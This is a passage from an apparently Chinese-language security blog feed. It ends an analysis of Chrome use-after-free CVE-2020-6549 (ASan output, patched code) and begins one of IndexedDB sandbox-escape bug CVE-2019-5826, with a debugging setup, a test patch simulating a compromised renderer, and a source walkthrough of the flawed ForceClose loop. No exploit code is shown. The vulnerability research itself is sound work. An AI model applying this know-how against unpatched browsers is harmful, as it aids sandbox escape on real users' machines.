class="line">  <span class="number">0x0fdf07112180</span>: f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7</span><br><span class="line">  <span class="number">0x0fdf07112190</span>: <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf071121a0</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">Shadow byte <span class="built_in">legend</span> (one shadow byte represents <span class="number">8</span> application bytes):</span><br><span class="line">  Addressable:           <span class="number">00</span></span><br><span class="line">  Partially addressable: <span class="number">01</span> <span class="number">02</span> <span class="number">03</span> <span class="number">04</span> <span class="number">05</span> <span class="number">06</span> <span class="number">07</span></span><br><span class="line">  Heap left redzone:       fa</span><br><span class="line">  Freed heap region:       fd</span><br><span class="line">  Stack left redzone:      f1</span><br><span class="line">  Stack mid redzone:       f2</span><br><span class="line">  Stack right redzone:     f3</span><br><span class="line">  Stack after <span class="keyword">return</span>:      f5</span><br><span class="line">  Stack use after scope:   f8</span><br><span class="line">  Global redzone:          f9</span><br><span class="line">  Global init order:       f6</span><br><span class="line">  Poisoned by user:        f7</span><br><span class="line">  Container overflow:      fc</span><br><span class="line">  Array cookie:            ac</span><br><span class="line">  Intra object redzone:    bb</span><br><span class="line">  ASan internal:           fe</span><br><span class="line">  Left alloca redzone:     ca</span><br><span class="line">  Right alloca redzone:    cb</span><br><span class="line">  Shadow gap:              cc</span><br><span class="line">==<span class="number">1</span>==ABORTING</span><br></pre></td></tr></table></figure></li></ul><h3 id="c-修复后的代码">c. 修复后的代码</h3><p>修复后的函数如下 - <a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc;l=251">fixed src</a></p><p>与原先的代码相比，修复后的函数在调用<code>updateSources</code>时，<strong>多了一个复制集合操作</strong>，不再直接遍历<code>sources_</code>集。这样即便内层<code>UpdateSources</code>修改了<code>sources_</code>集，也不会影响到外层<code>UpdateSources</code>函数所使用的迭代器了。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Handling of the ended event in JS triggered by DidStopMediaStreamSource()</span></span><br><span class="line">  <span class="comment">// may cause a reentrant call to this function, which can modify |sources_|.</span></span><br><span class="line">  <span class="comment">// Iterate over a copy of |sources_| to avoid invalidation of the iterator</span></span><br><span class="line">  <span class="comment">// when a reentrant call occurs.</span></span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">    注意这里，下面的循环处理的是sources_的拷贝sources_copy，而不再直接处理sources_</span></span><br><span class="line"><span class="comment">    这样，即便UpdateSources函数被再次调用，也不会影响上一层UpdateSources中所遍历的sources_copy集合了。</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">  <span class="keyword">auto</span> sources_copy = sources_;</span><br><span class="line">  <span class="keyword">if</span> (!media_element_-&gt;<span class="built_in">currentSrc</span>().<span class="built_in">IsEmpty</span>() &amp;&amp;</span><br><span class="line">      !media_element_-&gt;<span class="built_in">IsMediaDataCorsSameOrigin</span>()) &#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> source : sources_copy)</span><br><span class="line">      <span class="built_in">DidStopMediaStreamSource</span>(source.<span class="built_in">Get</span>());</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="三、参考">三、参考</h2><ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-6549">NIST - CVE-2020-6549 Detail</a></li><li><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2063">chromium project-zero Issue 2063</a></li><li><a href="https://developer.mozilla.org/zh-CN/">MDN</a> （<strong>JS API查询强烈推荐</strong>）</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CVE-2020-6549是Google Chrome里media中的Use-after-free漏洞，在版本84.0.4147.125之前该漏洞允许攻击者通过精心构造的html代码来造成堆破坏。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/vulnerability-analysis/chrome/"/>
    
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2019-5826分析</title>
    <link href="https://kiprey.github.io/2020/10/CVE-2019-5826/"/>
    <id>https://kiprey.github.io/2020/10/CVE-2019-5826/</id>
    <published>2020-10-11T14:38:27.000Z</published>
    <updated>2025-11-24T03:59:39.764Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li><p>CVE-2019-5826是Google Chrome里IndexedDB中的Use-after-free漏洞，在版本73.0.3683.86之前该漏洞允许攻击者通过<strong>搭配render的RCE漏洞</strong>来造成UAF并<strong>沙箱逃逸</strong>。</p><span id="more"></span></li></ul><h2 id="一、环境搭建">一、环境搭建</h2><ul><li><p>笔者所使用的chrome版本为<code>73.0.3683.75</code>（<a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc">源码</a>）。下载源码<strong>并打上patch</strong>，之后编译运行即可（在此感谢<a href="http://github.com/sadmess">@sad</a>提供的二进制文件，没有编译环境的穷人留下了泪水 T_T）</p><p>patch如下。至于为什么要打上patch，笔者将在下面详细介绍。</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">// third_party/blink/renderer/modules/indexeddb/web_idb_factory_impl.cc</span><br><span class="line">void WebIDBFactoryImpl::Open(</span><br><span class="line">       std::make_unique&lt;IndexedDBDatabaseCallbacksImpl&gt;(</span><br><span class="line">           base::WrapUnique(database_callbacks));</span><br><span class="line">   DCHECK(!name.IsNull());</span><br><span class="line">   factory_-&gt;Open(GetCallbacksProxy(std::move(callbacks_impl)),</span><br><span class="line">                  GetDatabaseCallbacksProxy(std::move(database_callbacks_impl)),</span><br><span class="line">                  name, version, transaction_id);</span><br><span class="line"><span class="addition">+  if (version == 3) &#123;</span></span><br><span class="line"><span class="addition">+    mojom::blink::IDBCallbacksAssociatedPtrInfo ptr_info;</span></span><br><span class="line"><span class="addition">+    auto request = mojo::MakeRequest(&amp;ptr_info);</span></span><br><span class="line"><span class="addition">+    factory_-&gt;DeleteDatabase(std::move(ptr_info), origin, name, true);</span></span><br><span class="line"><span class="addition">+    factory_-&gt;AbortTransactionsForDatabase(origin, base::OnceCallback&lt;void(blink::mojom::IDBStatus)&gt;());</span></span><br><span class="line"><span class="addition">+  &#125;</span></span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure></li><li><p>从<a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc">chrome源码</a>中依次复制</p><ul><li><code>indexed_db_database.cc</code></li><li><code>indexed_db_factory_impl.cc</code></li><li><code>web_idb_factory_impl.cc</code></li><li><code>indexed_db_connection.cc</code></li></ul><p>等文件中的源码，并将其保存至当前目录中的<code>chromeSrc</code>文件夹。这样做的目的是<strong>为了在调试时可以使用源代码</strong>。</p><blockquote><p>没有源码的调试chrome实在是太痛苦了QwQ</p></blockquote></li><li><p>老样子，使用gdb脚本来辅助调试</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># gdbinit</span></span><br><span class="line"><span class="comment"># 读取符号</span></span><br><span class="line">file ./chrome</span><br><span class="line"><span class="comment"># 设置启动参数</span></span><br><span class="line"><span class="built_in">set</span> args http://localhost:8000/test.html</span><br><span class="line"><span class="comment"># 设置源码路径</span></span><br><span class="line">directory chromeSrc/</span><br><span class="line"><span class="comment"># 设置执行fork后继续调试父进程</span></span><br><span class="line"><span class="built_in">set</span> follow-fork-mode parent</span><br></pre></td></tr></table></figure><blockquote><p>这里没有设置<code>--headless</code>，是因为chrome<strong>单次刷新页面的速度比gdb重启chrome的速度快上很多</strong>，这样每次修改完<code>exploit/poc</code>后只需点击刷新即可。</p></blockquote><p>输入以下命令即可开启调试</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gdb -x gdbinit</span><br></pre></td></tr></table></figure></li><li><p>如果执行时提示<code>No usable sandbox!</code>，执行以下命令</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> sysctl -w kernel.unprivileged_userns_clone=1</span><br></pre></td></tr></table></figure><p><strong>机器重启后该命令将会失效</strong>，届时需要重新执行。</p></li></ul><h2 id="二、IndexedDB简介">二、IndexedDB简介</h2><ul><li><p>Chrome中IndexedDB的大部分是在浏览器进程中实现。 浏览器和渲染中都存在几个不同的mojo IPC接口，用于进程之间的通信，并且使得沙盒渲染能够执行IndexedDB的操作。</p></li><li><p>IndexedDBFactory <a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/public/mojom/indexeddb/indexeddb.mojom">mojo接口</a>是渲染的主要入口点。 <strong>大多数操作（打开、关闭数据库等）都是通过IndexedDBFactory实例来进一步操作IndexedDatabase实例</strong>（注意这句话）。</p></li><li><p>IndexedDB有关于数据库和连接的概念。 对于Chrome-IndexedDB，分别由<code>IndexedDBDatabase</code>和<code>IndexedDBConnection</code>类表示。 在某一时间段内可以<strong>存在对同一数据库的多个连接</strong>，但是每个数据库<strong>只有一个IndexedDBDatabase对象</strong>。</p></li><li><p>另一个要理解的重要概念是<strong>请求。 打开和删除数据库操作不可能同时发生</strong>，但会规划执行相应操作的请求。 通过<code>IndexedDBDatabase::OpenRequest</code> 和<code>IndexedDBDatabase::DeleteRequest</code>类可以实现这些功能。</p><blockquote><p><code>OpenRequest</code>类和<code>DeleteRequest</code>类是声明在<code>IndexedDBDatabase</code>类中的，换句话说这两个类都是<code>IndexedDBDatabase</code>类的子类。</p></blockquote></li><li><p>IndexedDBDatabase对象是一种<strong>引用计数（Reference counted）的对象</strong>。 针对该对象的计数引用被保存在IndexedDBConnection对象、IndexedDBTransaction对象或其他正在进行或待处理的请求对象中。 一旦引用计数降至0，会立即释放对象。</p></li><li><p>释放数据库对象后，<strong>会从数据库映射中删除指向IndexedDBDatabase的相应原始指针</strong>，这点非常重要。</p></li><li><p>我们顺便简单了解一下IndexDB的<code>JS API</code></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">dbName = <span class="string">&quot;mycurrent&quot;</span>;</span><br><span class="line"><span class="comment">// 打开一个数据库，其中数据库名称为dbName，2为数据库版本</span></span><br><span class="line"><span class="comment">// 返回一个requests，这个request在这里应该是OpenRequest</span></span><br><span class="line"><span class="keyword">var</span> request = indexedDB.<span class="title function_">open</span>(dbName, <span class="number">2</span>);</span><br><span class="line"><span class="comment">// onsuccess是该request处理完成后所执行的回调函数</span></span><br><span class="line">request.<span class="property">onsuccess</span> = <span class="keyword">function</span> (<span class="params">event</span>) &#123;</span><br><span class="line">  <span class="comment">// 当该request执行成功后，request中的result成员为所打开的数据库对象</span></span><br><span class="line">  db = request.<span class="property">result</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 关闭一个数据库</span></span><br><span class="line"><span class="keyword">var</span> deleteRequest = indexedDB.<span class="title function_">deleteDatabase</span>(dbName);</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>具体IndexedDB 的细节我们将在下节详细讲解。</p></blockquote><h2 id="三、漏洞分析">三、漏洞分析</h2><h3 id="1-connections-成员变量">1. connections_成员变量</h3><p>在讲解漏洞代码之前，我们先了解一下<code>IndexedDBDatabase::connections_</code>成员变量。<code>connections_</code>集合存储着<strong>当前连接至<code>IndexedDatabase</code>的所有连接</strong>。当有新connection连接至数据库，或某个connection被中断时，该<code>connections_</code>变量都会被修改（执行insert或remove函数）。而该关键变量是一个<code>list_set</code>类型的成员。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBDatabase &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">private</span>:</span><br><span class="line">      list_set&lt;IndexedDBConnection*&gt; connections_;</span><br><span class="line">    <span class="comment">// ...</span></span><br></pre></td></tr></table></figure><p><code>list_set</code>类型是<code>list</code>与<code>set</code>的结合体，这里我们只需关注该结构体的<code>end</code>函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">iterator <span class="title">end</span><span class="params">()</span> </span>&#123; <span class="keyword">return</span> <span class="built_in">iterator</span>(list_.<span class="built_in">end</span>()); &#125;</span><br></pre></td></tr></table></figure><p>可以看到，<code>list_set::end</code>函数返回的是<strong>list的迭代器</strong>。</p><h3 id="2-database-map-成员变量">2. database_map_成员变量</h3><p>该成员变量保存了所有指向打开的<code>IndexedDatabase</code>的<strong>原始指针</strong></p><blockquote><p>注意，直接使用C++的原始指针通常是一个比较危险的事情。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBFactoryImpl : <span class="keyword">public</span> IndexedDBFactory &#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line"> <span class="keyword">private</span>:</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  std::map&lt;IndexedDBDatabase::Identifier, IndexedDBDatabase*&gt; database_map_;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当打开一个新的数据库时，指向该数据库的原始指针将会被添加进<code>database_map_</code>中；同样当关闭一个数据库时，指向该数据库的原始指针将会从<code>database_map_</code>中被移除。</p><h3 id="3-漏洞流程">3. 漏洞流程</h3><h4 id="a-“悬垂”指针">a. “悬垂”指针</h4><p>我们先来简单了解一下删除数据库的流程。</p><ul><li><p>当JS中执行<code>indexedDB.deleteDatabase</code>函数时，通过render与chrome之间的IPC通信，chrome进程会执行<a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_factory_impl.cc;l=492;bpv=0;bpt=1">IndexedDBFactoryImpl::DeleteDatabase</a>函数，在该函数中，程序会进一步调用对应<code>IndexedDBDatabase</code>的<code>DeleteDatabase</code>函数来处理对应的数据库。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBFactoryImpl::DeleteDatabase</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> base::string16&amp; name,</span></span></span><br><span class="line"><span class="params"><span class="function">        scoped_refptr&lt;IndexedDBCallbacks&gt; callbacks,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> Origin&amp; origin,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> base::FilePath&amp; data_directory,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">bool</span> force_close)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">IDB_TRACE</span>(<span class="string">&quot;IndexedDBFactoryImpl::DeleteDatabase&quot;</span>);</span><br><span class="line">  <span class="comment">// 每个IndexedDatabase在IndexedDBFactoryImpl类中都有对应唯一的idntifier</span></span><br><span class="line">  <span class="comment">// 该函数通过数据库名称来获取identifier并进一步在database_map中查找对应的IndexedDatabase指针</span></span><br><span class="line">  <span class="function">IndexedDBDatabase::Identifier <span class="title">unique_identifier</span><span class="params">(origin, name)</span></span>;</span><br><span class="line">  <span class="type">const</span> <span class="keyword">auto</span>&amp; it = database_map_.<span class="built_in">find</span>(unique_identifier);</span><br><span class="line">  <span class="keyword">if</span> (it != database_map_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    <span class="comment">// 如果找到了对应的数据库，则执行该数据库的DeleteDatabase函数</span></span><br><span class="line">    it-&gt;second-&gt;<span class="built_in">DeleteDatabase</span>(callbacks, force_close);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br></pre></td></tr></table></figure></li><li><p>在<a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc;l=1862">IndexedDBDatabase::DeleteDatabase</a>中，程序会添加一个<code>DeleteRequest</code>到当前<code>IndexedDatabase</code>中的待处理请求列表中，当数据库处理到<code>DeleteRequest</code>时，数据库就会马上关闭。这样做的目的是为了<strong>在剩余的请求（<code>DeleteRequest</code>前的所有请求）全部处理完之后，再关闭当前数据库</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::DeleteDatabase</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    scoped_refptr&lt;IndexedDBCallbacks&gt; callbacks,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">bool</span> force_close)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">AppendRequest</span>(std::<span class="built_in">make_unique</span>&lt;DeleteRequest&gt;(<span class="keyword">this</span>, callbacks));</span><br><span class="line">  <span class="comment">// Close the connections only after the request is queued to make sure</span></span><br><span class="line">  <span class="comment">// the store is still open.</span></span><br><span class="line">  <span class="keyword">if</span> (force_close)</span><br><span class="line">    <span class="built_in">ForceClose</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>但是倘若<strong>设置了<code>force_close</code>标志</strong>后，则程序将会进一步执行<code>ForceClose</code>函数来强制关闭所有的<code>request</code>和<code>connection</code>。但是，第二段<strong>用于遍历关闭连接的代码</strong>在修改<code>connections_</code>时<strong>并不安全</strong>。<strong>（漏洞点!）</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::ForceClose</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="comment">// IndexedDBConnection::ForceClose() may delete this database, so hold ref.</span></span><br><span class="line">  <span class="function">scoped_refptr&lt;IndexedDBDatabase&gt; <span class="title">protect</span><span class="params">(<span class="keyword">this</span>)</span></span>;</span><br><span class="line">  <span class="comment">// 循环将所有尚未处理的请求强制关闭</span></span><br><span class="line">  <span class="keyword">while</span> (!pending_requests_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    std::unique_ptr&lt;ConnectionRequest&gt; request =</span><br><span class="line">        std::<span class="built_in">move</span>(pending_requests_.<span class="built_in">front</span>());</span><br><span class="line">    pending_requests_.<span class="built_in">pop</span>();</span><br><span class="line">    request-&gt;<span class="built_in">AbortForForceClose</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 循环将所有连接到当前数据库的connections强制断开</span></span><br><span class="line">  <span class="comment">// 注意！这段代码在修改connection_时不够安全</span></span><br><span class="line">  <span class="keyword">auto</span> it = connections_.<span class="built_in">begin</span>();</span><br><span class="line">  <span class="keyword">while</span> (it != connections_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    IndexedDBConnection* connection = *it++;</span><br><span class="line">    <span class="comment">// 注意这一步，执行`connection-&gt;ForceClose()`时，程序会关闭当前连接。</span></span><br><span class="line">    <span class="comment">// 但倘若当前遍历的连接是connection_中的最后一条连接，则会执行函数StartUpgrade以建立新连接</span></span><br><span class="line">    connection-&gt;<span class="built_in">ForceClose</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 常规检查</span></span><br><span class="line">  <span class="built_in">DCHECK</span>(connections_.<span class="built_in">empty</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(!active_request_);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在第二个用于关闭connection的循环中，程序会执行<code>connection-&gt;ForceClose()</code>，即<a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_connection.cc;l=48;bpv=0;bpt=0">IndexedDBConnection::ForceClose函数</a>，以强制关闭该connection。而为了在<code>IndexedDBDatabase</code>中释放当前连接在数据库中所占用的资源，在这个函数中，程序会进一步调用<code>IndexedDBDatabase::Close</code>函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBConnection::ForceClose</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!callbacks_.<span class="built_in">get</span>())</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// IndexedDBDatabase::Close() can delete this instance.</span></span><br><span class="line">  base::WeakPtr&lt;IndexedDBConnection&gt; this_obj = weak_factory_.<span class="built_in">GetWeakPtr</span>();</span><br><span class="line">  <span class="function">scoped_refptr&lt;IndexedDBDatabaseCallbacks&gt; <span class="title">callbacks</span><span class="params">(callbacks_)</span></span>;</span><br><span class="line">  <span class="comment">// 注意这条代码</span></span><br><span class="line">  database_-&gt;<span class="built_in">Close</span>(<span class="keyword">this</span>, <span class="literal">true</span> <span class="comment">/* forced */</span>);</span><br><span class="line">  <span class="keyword">if</span> (this_obj) &#123;</span><br><span class="line">    database_ = <span class="literal">nullptr</span>;</span><br><span class="line">    callbacks_ = <span class="literal">nullptr</span>;</span><br><span class="line">    active_observers_.<span class="built_in">clear</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  callbacks-&gt;<span class="built_in">OnForcedClose</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc;l=1897">IndexDBDatabase::Close函数</a>会依次执行一系列操作，但这里我们只关注两个操作。该函数中，程序会先<strong>在<code>connection_</code>集合中删除当前连接</strong>，之后<strong>执行<code>active_request_-&gt;OnConnectionClosed</code>函数</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::Close</span><span class="params">(IndexedDBConnection* connection, <span class="type">bool</span> forced)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(connections_.<span class="built_in">count</span>(connection));</span><br><span class="line">  <span class="built_in">DCHECK</span>(connection-&gt;<span class="built_in">IsConnected</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(connection-&gt;<span class="built_in">database</span>() == <span class="keyword">this</span>);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">IDB_TRACE</span>(<span class="string">&quot;IndexedDBDatabase::Close&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 终止当前连接中所有的未完成事务</span></span><br><span class="line">  connection-&gt;<span class="built_in">FinishAllTransactions</span>(<span class="built_in">IndexedDBDatabaseError</span>(</span><br><span class="line">      blink::kWebIDBDatabaseExceptionUnknownError, <span class="string">&quot;Connection is closing.&quot;</span>));</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 从数据库中的connections_集合中删除当前request</span></span><br><span class="line">  connections_.<span class="built_in">erase</span>(connection);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 通知当前正在处理的请求，因为当前请求可能需要进行清理或者继续进行操作</span></span><br><span class="line">  <span class="keyword">if</span> (active_request_)</span><br><span class="line">    active_request_-&gt;<span class="built_in">OnConnectionClosed</span>(connection);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 如果当前数据库中的所有连接和所有请求均已经全部释放完成，则从IndexDBFactory类实例中删除指向当前IndexedDBData的指针</span></span><br><span class="line">  <span class="keyword">if</span> (connections_.<span class="built_in">empty</span>() &amp;&amp; !active_request_ &amp;&amp; pending_requests_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    backing_store_ = <span class="literal">nullptr</span>;</span><br><span class="line">    factory_-&gt;<span class="built_in">ReleaseDatabase</span>(identifier_, forced);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>OnConnectionClosed</code>函数中会先判断当前待处理connection<strong>是否被过早关闭</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">OnConnectionClosed</span><span class="params">(IndexedDBConnection* connection)</span> <span class="keyword">override</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 如果连接过早关闭（即一个pending的connection被关闭了，此时会调用OnConnectionClosed</span></span><br><span class="line">    <span class="keyword">if</span> (connection &amp;&amp; connection-&gt;<span class="built_in">callbacks</span>() == pending_-&gt;database_callbacks) &#123;</span><br><span class="line">        pending_-&gt;callbacks-&gt;<span class="built_in">OnError</span>(</span><br><span class="line">            <span class="built_in">IndexedDBDatabaseError</span>(blink::kWebIDBDatabaseExceptionAbortError,</span><br><span class="line">                                   <span class="string">&quot;The connection was closed.&quot;</span>));</span><br><span class="line">        <span class="comment">// 